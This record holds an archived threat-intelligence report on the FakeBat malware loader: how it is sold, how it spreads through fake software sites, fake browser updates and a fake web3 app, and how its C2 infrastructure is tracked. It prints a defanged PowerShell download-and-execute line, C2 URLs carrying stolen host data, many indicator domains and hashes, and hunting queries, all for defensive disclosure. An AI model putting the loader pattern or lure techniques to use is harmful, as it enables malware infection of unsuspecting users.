{ "id": "615874bc-4413-4c5f-b29e-2602d06abdbc", "created_at": "2026-04-06T00:13:25.861879Z", "updated_at": "2026-04-10T03:35:52.820654Z", "deleted_at": null, "sha1_hash": "adc3bbd04b39dfd993f8483a7b6dacf2c4304a65", "title": "Exposing FakeBat loader: distribution methods and adversary infrastructure", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2534639, "plain_text": "Exposing FakeBat loader: distribution methods and adversary\r\ninfrastructure\r\nBy Quentin Bourgue\u0026nbsp;and\u0026nbsp;Sekoia TDR\r\nPublished: 2024-07-02 · Archived: 2026-04-05 14:30:07 UTC\r\nTable of contents\r\nContext\r\nInteractions on cybercrime forums\r\nFakeBat loader\r\nAssociated distribution service\r\nDifferent clusters distributing FakeBat\r\nMalvertising and software impersonation\r\nFake web browser updates\r\nSocial engineering schemes on social networks\r\nTracking adversaries infrastructure\r\nFakeBat C2 servers\r\nLanding pages impersonating popular software websites\r\nConclusion\r\nFakeBat IoCs \u0026 Technical details\r\nIoCs\r\nYARA rules\r\nExternal references\r\nContext\r\nOver the past few years, cybercriminals have increasingly used the drive-by download technique to distribute\r\nmalware via user web browsing. This technique mostly involves SEO-poisoning, malvertising, and code\r\ninjection into compromised websites to trick users into downloading fake software installers or browser\r\nupdates.\r\nThe drive-by download technique is commonly used by multiple intrusion sets to distribute loaders (e.g. FakeBat,\r\nBatLoader), botnets (e.g. IcedID, PikaBot), infostealers (e.g. Vidar, Lumma, Redline), post-exploitation\r\nframeworks (e.g. CobaltStrike, Sliver) and RATs (e.g. NetSupport), to name but a few. From our observations,\r\nsome of these attacks were conducted by Initial Access Brokers (IABs) and have led to the deployment of\r\nransomware (BlackCat, Royal).\r\nDuring the first semester of 2024, FakeBat (aka EugenLoader, PaykLoader) was one of the most widespread\r\nloaders using the drive-by download technique. FakeBat primarily aims to download and execute the next-stage\r\npayload, such as IcedID, Lumma, Redline, SmokeLoader, SectopRAT and Ursnif.\r\nhttps://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/\r\nPage 1 of 19\n\nIn 2024, Sekoia Threat Detection \u0026 Research (TDR) team discovered multiple FakeBat distribution campaigns.\r\nThese campaigns typically leverage landing pages impersonating legitimate software and are spread via\r\nmalvertising, fake web browser updates on compromised websites, and social engineering schemes on social\r\nnetworks. Additionally, TDR closely monitored the FakeBat C2 infrastructure to identify new C2 servers and\r\nchanges in FakeBat communications.\r\nThis FLINT aims to present the activities of the FakeBat operators on cybercrime forums, an analysis of\r\npreviously undocumented campaigns distributing FakeBat, technical details on its distribution campaigns\r\nand related C2 infrastructures. Additionally, TDR analysts share Indicators of Compromise (IoCs), YARA rules\r\nand tracking heuristics to monitor the FakeBat distribution and C2 infrastructures.\r\nInteractions on cybercrime forums\r\nFakeBat loader\r\nEmergence of FakeBat\r\nSince at least December 2022, the threat actor Eugenfest (aka Payk_34) has sold FakeBat as Loader-as-a-Service\r\non the Exploit forum.\r\nAs advertised by its representative FakeBat is a loader malware in MSI format that offers “several anti-detection\r\nfeatures, such as bypassing the Unwanted Software Policy of Google and Windows Defender alerts and being\r\nprotected from VirusTotal”.\r\nBy purchasing this service, FakeBat customers have access to an administration panel that allows them to:\r\ngenerate FakeBat builds;\r\nmanage the distributed payloads;\r\nmonitor the installations related to the payload distribution.\r\nNotably, the Malware-as-a-Service (MaaS) provides build templates to trojanise legitimate software, thus luring\r\npotential victims into executing FakeBat.\r\nThe FakeBat administration panel contains information related to the infected host, including the IP address,\r\ncountry, OS, web browser, mimicked software, and installation status. Customers can also write comments for\r\neach bot.\r\nSecond wave of advertising\r\nIn September 2023, FakeBat operators launched a new advertising campaign on cybercrime forums and Telegram\r\nchannels, introducing MSIX as a new format for their malware builds. Moreover, to bypass Microsoft\r\nSmartScreen security features, they added a digital signature to the FakeBat installer with a valid certificate. The\r\nsignature is included in the MSIX format and is available as an extra in the MSI format.\r\nhttps://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/\r\nPage 2 of 19\n\nFigure 1. FakeBat (aka Payk Loader) advertisement on the XSS forum, published by Payk_34 on 2\r\nSeptember 2023\r\nIt is noteworthy that the threat actor started using the new handle Payk_34 on the XSS forum and Telegram.\r\nPayk_34 is allegedly the administrator of the “Payk Loader”, for which it possibly provides support through the\r\nTelegram account spektr.\r\nIn September 2023, FakeBat was sold for $1,000 per week and $2,500 per month for the MSI format, $1,500 per\r\nweek and $4,000 per month for the MSIX format, and $1,800 per week and $5,000 per month for the MSI +\r\nSignature package.\r\nAccording to the operators’ publication on the associated Telegram channel, the MaaS has a limited number of\r\ncustomers:\r\nMSI – not available yet due to ongoing issues with Windows Defender.\r\nThere are still seats available on MSIX, but at this rate, they will soon run out.\r\n(translated from Russian) Payk_34’s publication indicating a “seat” number restriction related to\r\nits MaaS program, on 12 October 2023\r\nSuch a limitation is common for MaaS offerings, particularly for loaders, crypters or botnets, since malware\r\noperators aim to control distribution. Restricting the number of customers helps them manage support more\r\neffectively, limit the spread of the malware, and reduce the likelihood of detection by antivirus solutions.\r\nAssociated distribution service\r\nIn addition to the FakeBat MaaS, in September 2023, Payk_34 advertised an additional distribution service,\r\ncentred around FakeBat and landing pages:\r\nWe also offer an additional service for the project implementation, it includes:\r\n– Checking for all possible alerts.\r\nhttps://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/\r\nPage 3 of 19\n\n– Managing integrations for the landing pages.\r\n– Monitoring loader builds and updating them when alerts appear.\r\n– Handling delivery.\r\n– Managing almost everything related to the delivery.\r\nThe service is negotiated individually with each client.\r\nCost: from $3000, excluding the loader itself. Pricing depends on the complexity of the project.\r\n(translated from Russian) Payk_34’s publication advertising the distribution service\r\nThe provided service is comparable to a personalised Pay-Per-Install (PPI), as the FakeBat operators monetise\r\nthe installation of malicious software by delivering it on behalf of their customers.\r\nDifferent clusters distributing FakeBat\r\nSekoia analysts identified several infection chains distributing FakeBat, likely corresponding to different MaaS\r\ncustomers. The analysis detailed in this section covers three distribution clusters: malvertising and software\r\nimpersonation, fake web browser updates, and social engineering schemes on social networks.\r\nMalvertising and software impersonation\r\nSince January 2024, TDR has monitored numerous FakeBat malvertising campaigns leveraging malicious\r\nwebsites that impersonate popular software. Attackers use trusted advertising services, such as Google Ads, to\r\ndisplay these malicious websites at the top of search engine results when users search for software to download.\r\nThe malicious websites, also known as landing pages, are often copies of the official software homepages or\r\ndownload pages. They are typically hosted on typosquatting domain names. We observed FakeBat malvertising\r\ncampaigns targeting the following software:\r\n1Password\r\nAdvanced SystemCare\r\nAnyDesk\r\nBandicam\r\nBlender\r\nBraavos\r\nCisco Webex\r\nEpic Games\r\nGoogle Chrome\r\nInkscape\r\nMicrosoft OneNote\r\nMicrosoft Teams\r\nNotion\r\nOBS Studio\r\nOpenProject\r\nPlay WGT Golf\r\nPython\r\nShapr3D\r\nTodoist\r\nTrading View\r\nTrello\r\nVMware\r\nWebull\r\nWinRAR\r\nZoom\r\nList of software targeted by FakeBat malveritsing campaigns\r\nThe list of targeted software primarily includes popular organisational applications. By deploying infostealers,\r\nRATs or botnets on such targets, attackers can gain access to valuable accounts or systems, facilitating further\r\npost-compromise activities.\r\nhttps://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/\r\nPage 4 of 19\n\nThe download button on these malicious websites redirects the user to “/download/dwnl.php”, which subsequently\r\ndownloads from another domain a signed MSIX file corresponding to FakeBat.\r\nHere is an example of a FakeBat infection chain leveraging malvertising, observed by TDR on 30 May 2024:\r\n1. The website “hxxps://amydlesk[.]com/” displays a copy of the remote desktop software AnyDesk home\r\npage.\r\n2. The download button redirects to “hxxps://amydlesk[.]com/download/dwnl.php”.\r\n3. It downloads FakeBat from “hxxps://monkeybeta[.]com/build/AnyDesk-x86.msix” (MD5:\r\n4f2e138b6891395a408368a9a5998304).\r\n4. By executing the MSIX file, it executes the PowerShell script “iiu.ps1” which communicates with the\r\nFakeBat C2 server “hxxps://utr-jopass[.]com/buy/” and downloads the next-stage payload.\r\nFigure 2. Website impersonating and typosquatting AnyDesk to distribute FakeBat, as of 29 May\r\n2024\r\nFake web browser updates\r\nBy pivoting on the endpoint URL “/download/dwnl.php”, Sekoia analysts uncovered a large infrastructure of\r\nseveral hundreds of compromised websites distributing FakeBat through fake web browser updates.\r\nhttps://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/\r\nPage 5 of 19\n\nThese compromised websites are WordPress sites injected with malicious HTML and JavaScript designed to\r\nmislead users into thinking they need to update their Chrome browser due to a detected exploit. Clicking on the\r\n“Update” button redirects the user to download FakeBat. Additionally, users cannot interact with original\r\nWordPress sites due to the injected code prompting on the web browser update popup, encouraging them to\r\ndownload the fake update.\r\nThe main capabilities of the code injected into the compromised HTML page include:\r\nCreating a mask by setting the “aria-hidden” state to true, overlaying the rest of the original webpage, and\r\nfocusing user attention on the fake web browser update popup. This is done in the HTML class “hustle-popup-mask hustle-optin-mask”.\r\nIncluding the JavaScript library jQuery with a comment written in Russian “Подключение jQuery”\r\n(translated as Connection jQuery), in the HTML class “hustle-group-content”.\r\nCreating an HTML container positioned in the top-right corner of the webpage, in the HTML class “ad”.\r\nDisplaying the message “Warning Exploit Chrome Detect”, the Chrome browser logo, and the instruction\r\n“Update Chrome Browser”, in the HTML classes “top” and “content”.\r\nEmbedding JavaScript that redirects to the FakeBat download when the button is clicked, in the HTML\r\nclass “bottom”.\r\nAn example of the injected code is available in the following Gist:\r\nhttps://gist.github.com/qbourgue/e87d897c4f2f14bf715f432c2a2c1f28. \r\nhttps://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/\r\nPage 6 of 19\n\nFigure 3. Compromised website displaying a fake web browser update popup to distribute FakeBat\r\nUsing the PublicWWW search engine, as of June 2024, we identified more than 250 compromised websites\r\ninjected with malicious code redirecting visitors to download FakeBat:\r\n“/download/dwnl.php” “hustle-popup-mask hustle-optin-mask”\r\nA similar search on FOFA yields more than 120 allegedly compromise websites:\r\n“/download/dwnl.php” \u0026\u0026 “hustle-popup-mask hustle-optin-mask” \r\nWe believe that this number is underestimated, and it is likely that the infrastructure of compromised websites\r\nincludes several thousands WordPress sites.\r\nOf note, on 22 April 2024, eSentire TRU1 published a report on a campaign distributing FakeBat through fake\r\nbrowser updates by injecting JavaScript code into compromised websites. The cluster we identified during our\r\nrecent investigation appears to differ in the injected JavaScript code, the fake popup displayed and the payload\r\nhosting infrastructure.\r\nhttps://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/\r\nPage 7 of 19\n\nOn 15 May 2024, we uncovered a campaign targeting the web3 community that distributed FakeBat disguised\r\nas a fake web3 chat application called getmess[.]io2.\r\nFor this campaign, attackers used a dedicated website, verified social media profiles, and promotional videos, all\r\nof which appeared legitimate. We assess with high confidence that cybercriminals mimicked the legitimate chat\r\nsolution beoble to create the brand new identity getmess to spread the FakeBat malware3.\r\nThis cluster also uses the endpoint “/download/dwnl.php” to redirect users to the FakeBat download.\r\nFigure 4. Fake web3 chat application to distribute FakeBat on 15 May 2024\r\nIt is interesting to note that only users invited to join GetMess were able to download the payload, as access to the\r\ndownload URL required an invitation code. TDR analysts believe this technique increases the trustworthiness to\r\nthe fake application and helps to hide the final payload from bots and bypass the scrutiny of cybersecurity\r\nresearchers.\r\nTo spread the malicious website and share invitation codes, attackers used allegedly compromised social networks\r\naccounts. We identified profiles on X (formerly Twitter) and Telegram promoting it within web3 communities. It\r\nis highly likely that some Discord users were also targeted by this FakeBat campaign.\r\nThis social engineering phishing campaign employs techniques never seen before in association with FakeBat. We\r\nbelieve that attackers targeted the web3 community to steal data from most valuable accounts, such as those\r\nrelated to cryptocurrency wallets or NFTs owners.\r\nTracking adversaries infrastructure\r\nFakeBat C2 servers\r\nhttps://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/\r\nPage 8 of 19\n\nThe fake software installers are MSIX packages containing directories and files, including a malicious PowerShell\r\nscript. In the June 2024 version of FakeBat, the initial PowerShell script is straightforward, downloading and\r\nexecuting the next-stage payload from its C2 server:\r\n\u0026{$zqpl='hxxps://utr-krubz[.]com/buy/';$zqplii='lkmns32Sf3lkn';$iiii=(iwr -Uri $zqpl -UserAgent $zqplii -UseBas\r\nIn addition to hosting payloads, FakeBat C2 servers highly likely filter traffic based on characteristics such as the\r\nUser-Agent value, the IP address, and the location. This enables the distribution of the malware to specific targets.\r\nSince December 2023, TDR analysts have been monitoring the FakeBat C2 infrastructure to identify C2 servers\r\nand observe changes. The following is an overview of the C2 infrastructure since August 2023.\r\nFrom August to December 2023\r\nFrom mid-August to December 2023, the FakeBat PowerShell script fingerprinted the infected host and exfiltrated\r\nthe data through its C2 servers to the URL endpoint “/” using the following HTTP query parameters: av, domain,\r\nkey, site, status and os.\r\nExamples of C2 URLs include:\r\nhxxp://clk-info[.]site/?status=install\r\nhxxp://clk-info[.]site/?status=start\u0026av=Windows%20Defender\r\nhxxps://3010cars[.]top/?status=start\u0026av=Names\u0026domain=$domain\u0026os=$urlEncodedOsCaption\r\nThe PowerShell scripts also download and execute an encrypted payload, most often masqueraded as .jpg or\r\n.targ.gpg files. Most of the domain names hosting the next-stage payload were allegedly compromised.\r\nWe identified the following FakeBat C2 servers and hosting domain names, which we assess were not\r\ncompromised but are owned by the FakeBat operators:\r\n0212top[.]online\r\n0212top[.]site\r\n0212top[.]top\r\n0212top[.]xyz\r\n0909kses[.]top\r\n11234jkhfkujhs[.]online\r\n11234jkhfkujhs[.]site\r\n11234jkhfkujhs[.]top\r\n11234jkhfkujhs[.]xyz\r\n1212stars[.]online\r\n1212stars[.]site\r\n1212stars[.]top\r\n1212stars[.]xyz\r\n2311foreign[.]xyz\r\n3010cars[.]xyz\r\n3010offers[.]online\r\n3010offers[.]site\r\n3010offers[.]top\r\n3010offers[.]xyz\r\n343-ads-info[.]top\r\n364klhjsfsl[.]top\r\n465jsdlkd[.]top\r\n756-ads-info[.]site\r\n756-ads-info[.]top\r\n756-ads-info[.]xyz\r\n875jhrfks[.]top\r\n98762341tdgi[.]online\r\n98762341tdgi[.]site\r\nclk-brood[.]online\r\nclk-brood[.]top\r\nclk-info[.]ru\r\nclk-info[.]site\r\ncornbascet[.]ru\r\ncornbascet[.]site\r\ndns-inform[.]top\r\nfresh-prok[.]ru\r\nfresh-prok[.]site\r\nganalytics-api[.]com\r\ngotrustfear[.]ru\r\ngotrustfear[.]site\r\ninfocdn-111[.]online\r\ninfocdn-111[.]site\r\nhttps://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/\r\nPage 9 of 19\n\n2311forget[.]online\r\n2311forget[.]site\r\n2311forget[.]xyz\r\n2610asdkj[.]online\r\n2610asdkj[.]site\r\n2610asdkj[.]top\r\n2610asdkj[.]xyz\r\n2610kjhsda[.]online\r\n2610kjhsda[.]site\r\n2610kjhsda[.]top\r\n2610kjhsda[.]xyz\r\n3010cars[.]online\r\n3010cars[.]site\r\n3010cars[.]top\r\n98762341tdgi[.]top\r\n98762341tdgi[.]xyz\r\n999-ads-info[.]top\r\nads-info[.]ru\r\nads-info[.]site\r\naipanelnew[.]ru\r\naipanelnew[.]site\r\ncdn-ads[.]ru\r\ncdn-ads[.]site\r\ncdn-dwnld[.]ru\r\ncdn-dwnld[.]site\r\ncdn-new-dwnl[.]ru\r\nclk-brom[.]ru\r\nclk-brom[.]site\r\ninfocdn-111[.]xyz\r\nnew-prok[.]ru\r\nnew-prok[.]site\r\nnewtorpan[.]ru\r\nnewtorpan[.]site\r\nprkl-ads[.]ru\r\nprkl-ads[.]site\r\ntest-pn[.]ru\r\ntest-pn[.]site\r\ntopttr[.]com\r\ntrust-flare[.]ru\r\ntrust-flare[.]site\r\ntrustdwnl[.]ru\r\nIt is interesting to note that numerous domain names listed above were registered by a Belarussian organisation\r\nnamed “John Bolton”, based on Whois data.\r\nFrom December 2023 to March 2024\r\nIn mid-December 2023, FakeBat started using a heavily obfuscated template for its initial PowerShell script. At\r\nthis stage, it ceased to fingerprint the infected host and communicated with its C2 servers to a new URL endpoint:\r\n“/check.php”. When the request was filtered, the C2 responded using the following HTTP headers:\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: REDACTED\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 0\r\nConnection: keep-alive\r\nWe identified the following FakeBat C2 servers matching the given configuration:\r\nads-analyze[.]online\r\nads-analyze[.]site\r\nads-analyze[.]top\r\nads-analyze[.]xyz\r\nads-change[.]online\r\nads-change[.]site\r\nads-change[.]top\r\nads-change[.]xyz\r\nads-creep[.]top\r\nads-creep[.]xyz\r\nads-eagle[.]top\r\nads-eagle[.]xyz\r\nads-forget[.]top\r\nads-hoop[.]top\r\nads-hoop[.]xyz\r\nads-moon[.]top\r\nads-moon[.]xyz\r\nads-pill[.]top\r\nads-pill[.]xyz\r\nads-star[.]online\r\nads-star[.]site\r\nads-star[.]top\r\nads-star[.]xyz\r\nads-strong[.]online\r\nads-strong[.]site\r\nads-strong[.]top\r\nads-strong[.]xyz\r\nads-tooth[.]top\r\nads-tooth[.]xyz\r\nads-work[.]site\r\nads-work[.]top\r\nads-work[.]xyz\r\nhttps://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/\r\nPage 10 of 19\n\nAll domains were hosted on 62.204.41[.]98 (AS59425 , HORIZONMSK-AS) from 16 December 2023, until at\r\nleast 20 June 2024, at the time of writing. Similarly to the previous period, these domain names were registered by\r\n“John Bolton”.\r\nFrom March to June 2024\r\nFrom the end of March to 20 June 2024, at the time of writing, FakeBat initial PowerShell script communicated\r\nwith its C2 servers to the URL endpoints “/profile/”, “/profile1/”, and later “/buy/”, which responded using the\r\nfollowing HTTP headers:\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=100\r\ncontent-type: text/html; charset=UTF-8\r\ncontent-length: 0\r\ndate: REDACTED\r\nserver: LiteSpeed\r\nAt the time of writing, we identified the following FakeBat C2 servers matching this configuration:\r\ncdn-inform[.]com\r\nudr-offdips[.]com\r\nurd-apdaps[.]com\r\nusm-pontic[.]com\r\nutd-corts[.]com\r\nutd-forts[.]com\r\nutd-gochisu[.]com\r\nutd-horipsy[.]com\r\nutm-adrooz[.]com\r\nutm-adschuk[.]com\r\nutm-adsgoogle[.]com\r\nutm-adsname[.]com\r\nutm-advrez[.]com\r\nutm-drmka[.]com\r\nutm-fukap[.]com\r\nutm-msh[.]com\r\nutr-gavlup[.]com\r\nutr-jopass[.]com\r\nutr-krubz[.]com\r\nutr-provit[.]com\r\nTDR analysts actively track this C2 infrastructure using the following research queries:\r\nOn VirusTotal, based on the URL patterns and HTTP headers:\r\nentity:url ( exact_path:/profile/ OR exact_path:/profile1/ OR exact_path:/buy/ ) response_code:503\r\nheader_value:”LiteSpeed” NOT header:cache-control\r\nOn Censys, based on the domain name pattern and the Autonomous System (AS) reference:\r\nautonomous_system.asn={60117,59425} and name=/(cdn|udr|utd|utm|utr|usm)-.*/\r\nAll domains were hosted on either 185.198.59[.]26 or 194.36.191[.]196, both of them belonging to the AS 60117,\r\nHost Sailor Ltd.\r\nNoteworthy, FakeBat operators anonymised the Whois records of the registered domain names for defense\r\nevasion.\r\nLanding pages impersonating popular software websites\r\nhttps://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/\r\nPage 11 of 19\n\nOver the past few years, cybercriminals have increasingly used landing pages impersonating legitimate software\r\nwebsites in their distribution campaigns, masquerading their malware as legitimate installers.\r\nSince December 2022, TDR analysts track adversaries’ infrastructure hosting these landing pages by\r\nproactively searching for copies of popular software websites hosted on unofficial domain names. While part\r\nof the results are related to FakeBat distribution campaigns, there are many others pointing to different distribution\r\nclusters, presented below.\r\nFor example, we track websites impersonating the popular note-taking application Notion using the following\r\nsearches:\r\nOn urlscan:\r\npage.title:”Notion Desktop App for Mac \u0026 Windows” NOT page.domain:notion.so\r\nOn Censys:\r\nservices:(http.response.html_title:”Notion Desktop App for Mac \u0026 Windows” and not\r\nhttp.request.uri:”*notion.so*”)\r\nOver the last month, these heuristics have yielded the following domain names, that we consider as malicious:\r\nfindreaders[.]com\r\nnoltlion[.]com\r\nnotilion[.]co\r\nnotilon[.]co\r\nnotion-loads[.]com\r\nnotion[.]findreaders[.]com\r\nnotion[.]help\r\nnotion[.]ilusofficial[.]com\r\nnotion[.]kyngsacademy[.]com\r\nnotion[.]li\r\nnotion[.]officespacesearchdc[.]com\r\nnotiorn[.]org\r\nnotiron[.]org\r\nnotliion[.]com\r\nnotlilon[.]co\r\nnotlon[.]top\r\nrabby[.]pro\r\nAmong these results, we assess with high confidence that 7 of them are associated with the FakeBat distribution\r\ninfrastructure:\r\nnotilon[.]co\r\nnotliion[.]com\r\nnotlon[.]top\r\nnotlilon[.]co\r\nnotion.findreaders[.]com\r\nfindreaders[.]com\r\nnotion.ilusofficial[.]com\r\nBy applying this methodology on several frequently impersonated software, we are able to monitor some well-known distribution clusters and constantly uncover new ones. In addition to FakeBat, the distribution clusters\r\ncurrently monitored by Sekoia include:\r\nhttps://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/\r\nPage 12 of 19\n\nAn alleged FIN7 campaign, tracked as UNC4536 and UNC3319 by Mandiant, that distributed\r\nNetSupport RAT, possibly followed by DiceLoader or Carbanak. It was reported using fake sites\r\nimpersonating multiple software promoted with Google Ads4 \r\n5\r\n. The campaign targeted several popular\r\nsoftware, including AnyDesk and Advanced IP Scanner, both largely used by IT administrators. Using our\r\ntracking heuristics, we detected this cluster that leverages domain names such as\r\nadvancedipscannerapp[.]com (Advanced IP scanner), bienvenido[.]com (AnyDesk) and\r\nwww.womansvitamin[.]com (AnyDesk).\r\nThe Nitrogen campaign that distributed Cobalt Strike, Sliver, or a Python-based backdoor, using fake\r\nsites promoted with Google Ads. These activities are associated with the BlackCat affiliate UNC4696 and\r\ncould have led to the deployment of their ransomware6. In particular, they impersonated the popular SSH\r\nclient Putty, with domain names such as pputy[.]com and puttyy[.]ca detected by our Putty heuristic.\r\nSeveral BatLoader distribution campaigns that impersonated IT software such as Slack and AnyDesk\r\nsince December 2022. In June 2024, our trackers identified domain names impersonating AnyDesk to\r\ndistribute BatLoader, such as anydesk[.]best and updaterdrivers[.]com.\r\nMultiple other clusters that distributed infostealer families, such as Lumma, Vidar and Redline.\r\nConclusion\r\nSold as Malware-as-a-Service (MaaS) to a limited number of customers, FakeBat became one of the most\r\nwidespread loaders that use the drive-by download technique in 2024. In addition to the standard MaaS package,\r\nthe FakeBat operators offer a distribution service based on their loader, dedicated landing pages, and possibly\r\nsearch engine advertisements.\r\nIn 2024, TDR analysts identified several FakeBat distribution campaigns that leveraged malvertising, software\r\nimpersonation, fake web browser updates, and social engineering schemes on social networks. We assess with\r\nhigh confidence that the variety of FakeBat distribution clusters is due to its diverse customer base mainly\r\nleveraging the malware, and operators distributing FakeBat for their Pay-Per-Install services.\r\nSince August 2023, we unveiled more than 130 domain names associated with high confidence to the FakeBat C2\r\nservers. Monitoring payloads, C2 and distribution infrastructures enables us to identify changes, possibly\r\nmotivated by efforts to evade detection. Indeed, FakeBat operators almost certainly constantly improve anti-detection and anti-analysis techniques, and rotate their C2 infrastructure, to ensure reliable MaaS services to their\r\ncustomers.\r\nTo protect our customers against drive-by download compromises, Sekoia.io analysts will continue to proactively\r\ntrack distribution infrastructures and identify new clusters of landing pages and fake browser updates.\r\nThank you for reading this blog post. Please don’t hesitate to provide your feedback on our publications by\r\nclicking here. You can also contact us at tdr[at]sekoia.io for further discussions.\r\nFakeBat IoCs \u0026 Technical details\r\nhttps://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/\r\nPage 13 of 19\n\nIoCs\r\nThe list of IoCs is available on Sekoia.io GitHub repository.\r\nFakeBat C2 servers\r\nBetween August and December 2023:\r\n0212top[.]online\r\n0212top[.]site\r\n0212top[.]top\r\n0212top[.]xyz\r\n0909kses[.]top\r\n11234jkhfkujhs[.]online\r\n11234jkhfkujhs[.]site\r\n11234jkhfkujhs[.]top\r\n11234jkhfkujhs[.]xyz\r\n1212stars[.]online\r\n1212stars[.]site\r\n1212stars[.]top\r\n1212stars[.]xyz\r\n2311foreign[.]xyz\r\n2311forget[.]online\r\n2311forget[.]site\r\n2311forget[.]xyz\r\n2610asdkj[.]online\r\n2610asdkj[.]site\r\n2610asdkj[.]top\r\n2610asdkj[.]xyz\r\n2610kjhsda[.]online\r\n2610kjhsda[.]site\r\n2610kjhsda[.]top\r\n2610kjhsda[.]xyz\r\n3010cars[.]online\r\n3010cars[.]site\r\n3010cars[.]top\r\n3010cars[.]xyz\r\n3010offers[.]online\r\n3010offers[.]site\r\n3010offers[.]top\r\n3010offers[.]xyz\r\n343-ads-info[.]top\r\n364klhjsfsl[.]top\r\n465jsdlkd[.]top\r\n756-ads-info[.]site\r\n756-ads-info[.]top\r\n756-ads-info[.]xyz\r\n875jhrfks[.]top\r\n98762341tdgi[.]online\r\n98762341tdgi[.]site\r\n98762341tdgi[.]top\r\n98762341tdgi[.]xyz\r\n999-ads-info[.]top\r\nads-info[.]ru\r\nads-info[.]site\r\naipanelnew[.]ru\r\naipanelnew[.]site\r\ncdn-ads[.]ru\r\ncdn-ads[.]site\r\ncdn-dwnld[.]ru\r\ncdn-dwnld[.]site\r\ncdn-new-dwnl[.]ru\r\nclk-brom[.]ru\r\nclk-brom[.]site\r\nclk-brood[.]online\r\nclk-brood[.]top\r\nclk-info[.]ru\r\nclk-info[.]site\r\ncornbascet[.]ru\r\ncornbascet[.]site\r\ndns-inform[.]top\r\nfresh-prok[.]ru\r\nfresh-prok[.]site\r\nganalytics-api[.]com\r\ngotrustfear[.]ru\r\ngotrustfear[.]site\r\ninfocdn-111[.]online\r\ninfocdn-111[.]site\r\ninfocdn-111[.]xyz\r\nnew-prok[.]ru\r\nnew-prok[.]site\r\nnewtorpan[.]ru\r\nnewtorpan[.]site\r\nprkl-ads[.]ru\r\nprkl-ads[.]site\r\ntest-pn[.]ru\r\ntest-pn[.]site\r\ntopttr[.]com\r\ntrust-flare[.]ru\r\ntrust-flare[.]site\r\ntrustdwnl[.]ru\r\nBetween December 2023 and March 2024:\r\nads-analyze[.]online\r\nads-analyze[.]site\r\nads-analyze[.]top\r\nads-analyze[.]xyz\r\nads-eagle[.]xyz\r\nads-forget[.]top\r\nads-hoop[.]top\r\nads-hoop[.]xyz\r\nads-star[.]xyz\r\nads-strong[.]online\r\nads-strong[.]site\r\nads-strong[.]top\r\nhttps://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/\r\nPage 14 of 19\n\nads-change[.]online\r\nads-change[.]site\r\nads-change[.]top\r\nads-change[.]xyz\r\nads-creep[.]top\r\nads-creep[.]xyz\r\nads-eagle[.]top\r\nads-moon[.]top\r\nads-moon[.]xyz\r\nads-pill[.]top\r\nads-pill[.]xyz\r\nads-star[.]online\r\nads-star[.]site\r\nads-star[.]top\r\nads-strong[.]xyz\r\nads-tooth[.]top\r\nads-tooth[.]xyz\r\nads-work[.]site\r\nads-work[.]top\r\nads-work[.]xyz\r\nBetween March and June 2024:\r\ncdn-inform[.]com\r\nudr-offdips[.]com\r\nurd-apdaps[.]com\r\nusm-pontic[.]com\r\nutd-corts[.]com\r\nutd-forts[.]com\r\nutd-gochisu[.]com\r\nutd-horipsy[.]com\r\nutm-adrooz[.]com\r\nutm-adschuk[.]com\r\nutm-adsgoogle[.]com\r\nutm-adsname[.]com\r\nutm-advrez[.]com\r\nutm-drmka[.]com\r\nutm-fukap[.]com\r\nutm-msh[.]com\r\nutr-gavlup[.]com\r\nutr-jopass[.]com\r\nutr-krubz[.]com\r\nutr-provit[.]com\r\nFakeBat distribution infrastructures\r\nMalvertising and software impersonation:\r\namydlesk[.]com\r\nnotilon[.]co\r\nnotliion[.]com\r\nnotlon[.]top\r\nnotlilon[.]co\r\nnotion.findreaders[.]com\r\nfindreaders[.]com\r\nnotion.ilusofficial[.]com\r\nFake web browser updates:\r\nbrow-ser-update[.]top\r\nhxxps://brow-ser-update[.]top/download/dwnl.php\r\nhxxps://brow-ser-update[.]top/GoogleChrome-x86.msix\r\nphotoshop-adobe[.]shop\r\nhxxps://photoshop-adobe[.]shop/download/dwnl.php\r\nc336d98d8d4810666ee4693e8c3a2a34191bad864d6b46e468a7eed36e7085f4 (GoogleChrome-x86.msix)\r\nb5ed2f42359e809bf171183a444457c378355d07b414f5828e1e4f7b35bb505f (boci.ps1)\r\nSocial engineering schemes on social networks:\r\nhttps://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/\r\nPage 15 of 19\n\napp.getmess[.]io\r\nhxxps://app.getmess[.]io/\r\nhxxps://app.getmess[.]io/download/dwnl.php\r\nhxxps://getmess[.]download/Getmess.msix\r\nutd-corts[.]com\r\nhxxp://utd-corts[.]com/buy/\r\n12ea41f2dfa89ad86f082fdf80ca57f14cd8a8f27280aca4f18111758de96d15 (Getmess.msix)\r\n72a1f6e7979daae38d8e0e14893db4c182b8362acc5d721141ed328ed02c7e28 (ynwje.ps1)\r\nFakeBat hashes\r\nMSIX 